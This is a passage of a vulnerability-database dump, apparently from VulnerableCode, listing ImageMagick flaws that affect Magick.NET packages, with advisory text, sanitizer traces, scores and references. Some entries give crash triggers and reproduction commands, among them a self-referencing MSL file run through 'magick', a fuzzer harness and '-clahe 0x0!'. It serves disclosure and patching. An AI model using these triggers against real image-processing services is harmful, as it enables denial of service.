vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases CVE-2026-26284, GHSA-wrhr-rf8j-r842
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-tv15-dcnu-pbbn
52
url VCID-utfe-h3b7-jqcj
vulnerability_id VCID-utfe-h3b7-jqcj
summary 
ImageMagick: MSL - Stack overflow in ProcessMSLScript
### Summary
Magick fails to check for circular references between two MSLs, leading to a stack overflow.

### Details
After reading a.msl using magick, the following is displayed:

`MSLStartElement` -> `ReadImage` -> `ReadMSLImage` -> `ProcessMSLScript` -> `xmlParseChunk` -> `xmlParseTryOrFinish` -> `MSLStartElement`

```bash
AddressSanitizer:DEADLYSIGNAL
=================================================================
==114345==ERROR: AddressSanitizer: UNKNOWN SIGNAL on unknown address 0x000000000000 (pc 0x72509fc7d804 bp 0x7ffd6598b390 sp 0x7ffd6598ab20 T0)
    #0 0x72509fc7d804 in strlen ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:388
[...]
```
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25971.json
reference_id
reference_type
scores
0
value 6.2
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25971.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-25971
reference_id
reference_type
scores
0
value 0.00043
scoring_system epss
scoring_elements 0.1302
published_at 2026-04-21T12:55:00Z
1
value 0.00043
scoring_system epss
scoring_elements 0.12922
published_at 2026-04-18T12:55:00Z
2
value 0.00043
scoring_system epss
scoring_elements 0.12919
published_at 2026-04-16T12:55:00Z
3
value 0.00043
scoring_system epss
scoring_elements 0.13017
published_at 2026-04-13T12:55:00Z
4
value 0.00043
scoring_system epss
scoring_elements 0.13068
published_at 2026-04-12T12:55:00Z
5
value 0.00043
scoring_system epss
scoring_elements 0.13107
published_at 2026-04-11T12:55:00Z
6
value 0.00043
scoring_system epss
scoring_elements 0.13138
published_at 2026-04-09T12:55:00Z
7
value 0.00043
scoring_system epss
scoring_elements 0.13088
published_at 2026-04-08T12:55:00Z
8
value 0.00043
scoring_system epss
scoring_elements 0.13007
published_at 2026-04-07T12:55:00Z
9
value 0.00043
scoring_system epss
scoring_elements 0.13153
published_at 2026-04-02T12:55:00Z
10
value 0.00043
scoring_system epss
scoring_elements 0.13209
published_at 2026-04-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-25971
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25971
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25971
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 6.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
reference_id
reference_type
scores
0
value 6.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 6.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-8mpr-6xr2-chhc
reference_id
reference_type
scores
0
value 6.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-8mpr-6xr2-chhc
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-25971
reference_id
reference_type
scores
0
value 6.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-25971
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2442117
reference_id 2442117
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2442117
9
reference_url https://github.com/advisories/GHSA-8mpr-6xr2-chhc
reference_id GHSA-8mpr-6xr2-chhc
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-8mpr-6xr2-chhc
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases CVE-2026-25971, GHSA-8mpr-6xr2-chhc
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-utfe-h3b7-jqcj
53
url VCID-uvpj-a8v5-ebgz
vulnerability_id VCID-uvpj-a8v5-ebgz
summary 
Image Magick has a Memory Leak in coders/ashlar.c
Memory leak exists in `coders/ashlar.c`. The `WriteASHLARImage` allocates a structure.  However, when an exception is thrown, the allocated memory is not properly released, resulting in a potential memory leak.

```
```bash
==78968== Memcheck, a memory error detector
==78968== Copyright (C) 2002-2022, and GNU GPL'd, by Julian Seward et al.
==78968== Using Valgrind-3.22.0 and LibVEX; rerun with -h for copyright info
==78968== 
==78968== HEAP SUMMARY:
==78968==     in use at exit: 17,232 bytes in 4 blocks
==78968==   total heap usage: 4,781 allocs, 4,777 frees, 785,472 bytes allocated
```
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25969.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25969.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-25969
reference_id
reference_type
scores
0
value 0.00018
scoring_system epss
scoring_elements 0.04879
published_at 2026-04-21T12:55:00Z
1
value 0.00057
scoring_system epss
scoring_elements 0.17825
published_at 2026-04-16T12:55:00Z
2
value 0.00057
scoring_system epss
scoring_elements 0.17882
published_at 2026-04-13T12:55:00Z
3
value 0.00057
scoring_system epss
scoring_elements 0.17931
published_at 2026-04-12T12:55:00Z
4
value 0.00057
scoring_system epss
scoring_elements 0.17976
published_at 2026-04-11T12:55:00Z
5
value 0.00057
scoring_system epss
scoring_elements 0.1796
published_at 2026-04-09T12:55:00Z
6
value 0.00057
scoring_system epss
scoring_elements 0.17899
published_at 2026-04-08T12:55:00Z
7
value 0.00057
scoring_system epss
scoring_elements 0.17811
published_at 2026-04-07T12:55:00Z
8
value 0.00057
scoring_system epss
scoring_elements 0.1811
published_at 2026-04-04T12:55:00Z
9
value 0.00057
scoring_system epss
scoring_elements 0.18055
published_at 2026-04-02T12:55:00Z
10
value 0.00057
scoring_system epss
scoring_elements 0.17835
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-25969
2
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
3
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
4
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
5
reference_url https://github.com/ImageMagick/ImageMagick/commit/a253d1b124ebdcc2832daac6f9a35c362635b40e
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/commit/a253d1b124ebdcc2832daac6f9a35c362635b40e
6
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-xgm3-v4r9-wfgm
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-xgm3-v4r9-wfgm
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-25969
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-25969
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2442116
reference_id 2442116
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2442116
9
reference_url https://github.com/advisories/GHSA-xgm3-v4r9-wfgm
reference_id GHSA-xgm3-v4r9-wfgm
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-xgm3-v4r9-wfgm
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases CVE-2026-25969, GHSA-xgm3-v4r9-wfgm
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-uvpj-a8v5-ebgz
54
url VCID-vaks-d4k5-zue7
vulnerability_id VCID-vaks-d4k5-zue7
summary 
ImageMagick MSL: Stack overflow via infinite recursion in ProcessMSLScript
## Summary

Stack overflow via infinite recursion in MSL (Magick Scripting Language) `<write>` command when writing to MSL format.

## Version

- ImageMagick 7.x (tested on current main branch)
- Commit: HEAD
- Requires: libxml2 support (for MSL parsing)

## Steps to Reproduce

### Method 1: Using ImageMagick directly

```bash
magick MSL:recursive.msl out.png
```

### Method 2: Using OSS-Fuzz reproduce

```bash
python3 infra/helper.py build_fuzzers imagemagick
python3 infra/helper.py reproduce imagemagick msl_fuzzer recursive.msl
```

Or run the fuzzer directly:
```bash
./msl_fuzzer recursive.msl
```

## Expected Behavior

ImageMagick should handle recursive MSL references gracefully by detecting the loop and returning an error.

## Actual Behavior

Stack overflow causes process crash:

```
AddressSanitizer:DEADLYSIGNAL
==PID==ERROR: AddressSanitizer: stack-overflow
    #0 MSLStartElement /src/imagemagick/coders/msl.c:7045
    #1 xmlParseStartTag /src/libxml2/parser.c
    #2 xmlParseChunk /src/libxml2/parser.c:11273
    #3 ProcessMSLScript /src/imagemagick/coders/msl.c:7405
    #4 WriteMSLImage /src/imagemagick/coders/msl.c:7867
    #5 WriteImage /src/imagemagick/MagickCore/constitute.c:1346
    #6 MSLStartElement /src/imagemagick/coders/msl.c:7045
    ... (infinite recursion, 287+ frames)
```

## Root Cause Analysis

In `coders/msl.c`, the `<write>` command handler in `MSLStartElement()` (line ~7045) calls `WriteImage()`. When the output filename specifies MSL format (`msl:filename`), `WriteMSLImage()` is called, which parses the MSL file again via `ProcessMSLScript()`.

If the MSL file references itself (directly or indirectly), this creates an infinite recursion loop:

```
MSLStartElement() → WriteImage() → WriteMSLImage() → ProcessMSLScript()
    → xmlParseChunk() → MSLStartElement() → ... (infinite loop)
```

## Impact

- **DoS**: Guaranteed crash via stack exhaustion
- **Affected**: Any application using ImageMagick to process user-supplied MSL files

## Additional Trigger Paths

The `<read>` command can also trigger recursion:

Indirect recursion is also possible (a.msl → b.msl → a.msl).

## Fuzzer

This issue was discovered using a custom MSL fuzzer:

```cpp
#include <cstdint>
#include <Magick++/Blob.h>
#include <Magick++/Image.h>
#include "utils.cc"

extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size)
{
  if (IsInvalidSize(Size))
    return(0);
  try
  {
    const Magick::Blob blob(Data, Size);
    Magick::Image image;
    image.magick("MSL");
    image.fileName("MSL:");
    image.read(blob);
  }
  catch (Magick::Exception)
  {
  }
  return(0);
}
```

This issue was found by Team FuzzingBrain @ Texas A&M University
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23874.json
reference_id
reference_type
scores
0
value 5.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23874.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-23874
reference_id
reference_type
scores
0
value 0.00019
scoring_system epss
scoring_elements 0.05194
published_at 2026-04-21T12:55:00Z
1
value 0.00019
scoring_system epss
scoring_elements 0.05051
published_at 2026-04-02T12:55:00Z
2
value 0.00019
scoring_system epss
scoring_elements 0.0508
published_at 2026-04-04T12:55:00Z
3
value 0.00019
scoring_system epss
scoring_elements 0.05101
published_at 2026-04-07T12:55:00Z
4
value 0.00019
scoring_system epss
scoring_elements 0.05134
published_at 2026-04-08T12:55:00Z
5
value 0.00019
scoring_system epss
scoring_elements 0.0515
published_at 2026-04-09T12:55:00Z
6
value 0.00019
scoring_system epss
scoring_elements 0.05125
published_at 2026-04-11T12:55:00Z
7
value 0.00019
scoring_system epss
scoring_elements 0.05108
published_at 2026-04-12T12:55:00Z
8
value 0.00019
scoring_system epss
scoring_elements 0.05093
published_at 2026-04-13T12:55:00Z
9
value 0.00019
scoring_system epss
scoring_elements 0.05041
published_at 2026-04-16T12:55:00Z
10
value 0.00019
scoring_system epss
scoring_elements 0.05046
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-23874
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23874
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23874
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 5.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.2
reference_id
reference_type
scores
0
value 5.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.2
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 5.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-9vj4-wc7r-p844
reference_id
reference_type
scores
0
value 5.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-20T21:37:11Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-9vj4-wc7r-p844
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-23874
reference_id
reference_type
scores
0
value 5.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-23874
8
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1126075
reference_id 1126075
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1126075
9
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2431034
reference_id 2431034
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2431034
10
reference_url https://github.com/advisories/GHSA-9vj4-wc7r-p844
reference_id GHSA-9vj4-wc7r-p844
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-9vj4-wc7r-p844
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.2
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-15ny-qqbj-qyfk
1
vulnerability VCID-1cpn-zvem-v7gt
2
vulnerability VCID-29r3-kvf4-n3hc
3
vulnerability VCID-2zje-ag2v-7kac
4
vulnerability VCID-54da-fzyt-4ud2
5
vulnerability VCID-5uyd-bv33-h7g1
6
vulnerability VCID-5zkt-kcgx-a3e2
7
vulnerability VCID-62ar-kwbq-nyh3
8
vulnerability VCID-69f6-ceje-hyah
9
vulnerability VCID-6h7x-3rue-kucp
10
vulnerability VCID-6rma-wjdv-uqe9
11
vulnerability VCID-6ztv-auh8-27gx
12
vulnerability VCID-acsa-1uwk-fqee
13
vulnerability VCID-anyp-2jr7-73a1
14
vulnerability VCID-b5pd-kk97-gban
15
vulnerability VCID-bd1g-sfsp-37h7
16
vulnerability VCID-bw4q-dt1r-y3e4
17
vulnerability VCID-cbqr-aybx-d3e6
18
vulnerability VCID-cuhw-ew1g-s3h2
19
vulnerability VCID-d8yf-8rff-3yhf
20
vulnerability VCID-dabd-m3mf-3ker
21
vulnerability VCID-dtza-65ku-aber
22
vulnerability VCID-emmr-15qp-vfah
23
vulnerability VCID-f1zu-xb4j-8qhp
24
vulnerability VCID-fnck-7mvx-hqc9
25
vulnerability VCID-g41y-dv8u-3yf1
26
vulnerability VCID-gdg8-aejn-83c4
27
vulnerability VCID-jc5m-7rvc-2qg6
28
vulnerability VCID-jcjk-s89c-mbbm
29
vulnerability VCID-jvq6-xjbu-fkb9
30
vulnerability VCID-kdw5-8y5z-zya5
31
vulnerability VCID-kefv-kpkk-wudf
32
vulnerability VCID-mntx-6yku-3qcx
33
vulnerability VCID-n47w-r932-abey
34
vulnerability VCID-p5aw-n691-nkff
35
vulnerability VCID-pcme-bwan-3bcf
36
vulnerability VCID-r3vw-ncns-cqgb
37
vulnerability VCID-rbdg-vz8x-ykah
38
vulnerability VCID-rj9n-ra1t-77dy
39
vulnerability VCID-rjkf-pdny-2fhn
40
vulnerability VCID-sd54-b8z1-2fg7
41
vulnerability VCID-sd7w-6qv5-73ge
42
vulnerability VCID-sdc2-fcap-abaz
43
vulnerability VCID-sw7g-hxxr-n3e1
44
vulnerability VCID-tv15-dcnu-pbbn
45
vulnerability VCID-utfe-h3b7-jqcj
46
vulnerability VCID-uvpj-a8v5-ebgz
47
vulnerability VCID-vpdn-g1k9-1kdn
48
vulnerability VCID-x44m-x33k-hydn
49
vulnerability VCID-x8c6-9pse-xkc8
50
vulnerability VCID-xbsu-ac6g-53fn
51
vulnerability VCID-y4hn-6bv6-jugw
52
vulnerability VCID-y58b-be93-hbfd
53
vulnerability VCID-yx7r-r7ez-7uhp
54
vulnerability VCID-z9t9-bxf9-hkfk
55
vulnerability VCID-zab9-9tqj-hbhg
56
vulnerability VCID-zpcy-nms7-kuha
57
vulnerability VCID-zx14-t8et-ufcq
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.2
aliases CVE-2026-23874, GHSA-9vj4-wc7r-p844
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-vaks-d4k5-zue7
55
url VCID-vkp6-wh22-eqap
vulnerability_id VCID-vkp6-wh22-eqap
summary 
ImageMagick CLAHE : Unsigned underflow and division-by-zero lead to OOB pointer arithmetic and process crash (DoS)
A single root cause in the CLAHE implementation — tile width/height becoming zero — produces two distinct but related unsafe behaviors.
Vulnerabilities exists in the `CLAHEImage()` function of ImageMagick’s `MagickCore/enhance.c`.

1. Unsigned integer underflow → out-of-bounds pointer arithmetic (OOB): when `tile_info.height == 0`, the expression `tile_info.height - 1` (unsigned) wraps to a very large value; using that value in pointer arithmetic yields a huge offset and OOB memory access (leading to memory corruption, SIGSEGV, or resource exhaustion).
2. **Division/modulus by zero**: where code performs `... / tile_info.width` or `... % tile_info.height` without re-checking for zero, causing immediate division-by-zero crashes under sanitizers or `abort` at runtime.

Both behaviors are triggered by the same invalid tile condition (e.g., CLI exact `-clahe 0x0!` or automatic tile derivation `dim >> 3 == 0` for very small images).

---
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-62594.json
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-62594.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-62594
reference_id
reference_type
scores
0
value 0.00014
scoring_system epss
scoring_elements 0.02624
published_at 2026-04-04T12:55:00Z
1
value 0.00014
scoring_system epss
scoring_elements 0.0261
published_at 2026-04-02T12:55:00Z
2
value 0.00017
scoring_system epss
scoring_elements 0.04036
published_at 2026-04-21T12:55:00Z
3
value 0.00017
scoring_system epss
scoring_elements 0.03968
published_at 2026-04-07T12:55:00Z
4
value 0.00017
scoring_system epss
scoring_elements 0.03973
published_at 2026-04-08T12:55:00Z
5
value 0.00017
scoring_system epss
scoring_elements 0.03998
published_at 2026-04-09T12:55:00Z
6
value 0.00017
scoring_system epss
scoring_elements 0.03967
published_at 2026-04-11T12:55:00Z
7
value 0.00017
scoring_system epss
scoring_elements 0.0395
published_at 2026-04-12T12:55:00Z
8
value 0.00017
scoring_system epss
scoring_elements 0.0392
published_at 2026-04-13T12:55:00Z
9
value 0.00017
scoring_system epss
scoring_elements 0.03903
published_at 2026-04-16T12:55:00Z
10
value 0.00017
scoring_system epss
scoring_elements 0.03915
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-62594
2
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
3
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
4
reference_url https://github.com/ImageMagick/ImageMagick/commit/7b47fe369eda90483402fcd3d78fa4167d3bb129
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-27T20:23:10Z/
url https://github.com/ImageMagick/ImageMagick/commit/7b47fe369eda90483402fcd3d78fa4167d3bb129
5
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1119296
reference_id 1119296
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1119296
6
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2406644
reference_id 2406644
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2406644
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-62594
reference_id CVE-2025-62594
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-62594
8
reference_url https://github.com/advisories/GHSA-wpp4-vqfq-v4hp
reference_id GHSA-wpp4-vqfq-v4hp
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-wpp4-vqfq-v4hp
9
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-wpp4-vqfq-v4hp
reference_id GHSA-wpp4-vqfq-v4hp
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-27T20:23:10Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-wpp4-vqfq-v4hp
fixed_packages
aliases CVE-2025-62594, GHSA-wpp4-vqfq-v4hp
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-vkp6-wh22-eqap
56
url VCID-vpdn-g1k9-1kdn
vulnerability_id VCID-vpdn-g1k9-1kdn
summary 
ImageMagick has heap buffer overflow in YUV 4:2:2 decoder
A heap buffer overflow write vulnerability exists in ReadYUVImage() (coders/yuv.c) when processing malicious YUV 4:2:2 (NoInterlace) images. The pixel-pair loop writes one pixel beyond the allocated row buffer.

```
=================================================================
==204642==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x5170000002e0 at pc 0x562d21a7e8de bp 0x7fffa9ae1270 sp 0x7fffa9ae1260
WRITE of size 8 at 0x5170000002e0 thread T0
```
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25986.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25986.json
1
